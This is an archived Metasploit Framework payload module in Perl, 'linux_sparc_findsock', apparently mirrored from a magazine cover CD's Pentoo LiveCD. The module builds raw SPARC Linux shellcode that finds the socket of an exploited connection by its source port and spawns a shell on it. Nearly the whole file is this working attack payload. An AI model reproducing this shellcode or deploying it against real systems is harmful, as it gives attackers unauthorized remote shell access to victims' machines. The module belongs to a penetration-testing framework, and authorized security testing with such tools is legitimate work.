home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / linux_sparc_findsock.pm < prev    next >
Text File  |  2006-06-30  |  2KB  |  72 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::linux_sparc_findsock;
  11. use base 'Msf::PayloadComponent::FindConnection';
  12. use strict;
  13. use Pex::SPARC;
  14.  
  15. my $info =
  16. {
  17.   'Name'         => 'LINUX SPARC SrcPort Find Shell',
  18.   'Version'      => '$Revision: 1.1 $',
  19.   'Description'  => 'Spawn a shell on the established connection',
  20.   'Authors'      => [ 'vlad902 <vlad902 [at] gmail.com>', ],
  21.   'Arch'         => [ 'sparc' ],
  22.   'Priv'         => 0,
  23.   'OS'           => [ 'linux' ],
  24.   'Size'         => '',
  25.   'UserOpts'     =>
  26.     {
  27.       'CPORT' => [1, 'PORT', 'Local port used by exploit'],
  28.     }
  29. };
  30.  
  31. sub new {
  32.   my $class = shift;
  33.   my $hash = @_ ? shift : { };
  34.   $hash = $class->MergeHashRec($hash, {'Info' => $info});
  35.   my $self = $class->SUPER::new($hash, @_);
  36.  
  37.   $self->_Info->{'Size'} = $self->_GenSize;
  38.   return($self);
  39. }
  40.  
  41. sub Build {
  42.   my $self = shift;
  43.   return($self->Generate($self->GetVar('CPORT')));
  44. }
  45.  
  46. sub Generate {
  47.   my $self = shift;
  48.   my $port = shift;
  49.  
  50.   my $shellcode =
  51.     Pex::SPARC::Set($port, "l6").
  52.     "\x9c\x2b\xa0\x07\x90\x1a\x80\x0a\xd0\x23\xbf\xe0\x90\x02\x20\x01".
  53.     "\x90\x0a\x2f\xff\x96\x10\x20\x10\x94\x23\xa0\x04\x92\x23\xa0\x20".
  54.     "\xd0\x3b\xbf\xf0\xd4\x3b\xbf\xf8\x92\x23\xa0\x10\x90\x10\x20\x07".
  55.     "\x82\x10\x20\xce\x91\xd0\x20\x10\x92\x10\x20\x03\xea\x13\xbf\xe2".
  56.     "\xba\x9d\x40\x16\x12\xbf\xff\xf2\xd0\x03\xbf\xf0\x92\xa2\x60\x01".
  57.     "\x82\x10\x20\x5a\x91\xd0\x20\x10\x12\xbf\xff\xfc\x96\x1a\xc0\x0b".
  58.     "\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10".
  59.     "\x92\x23\xa0\x08\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc".
  60.     "\x82\x10\x20\x3b\x91\xd0\x20\x08";
  61.  
  62.   return $shellcode;
  63. }
  64.  
  65. sub _GenSize {
  66.   my $self = shift;
  67.   my $bin = $self->Generate('4444');
  68.   return(length($bin));
  69. }
  70.  
  71. 1;
  72.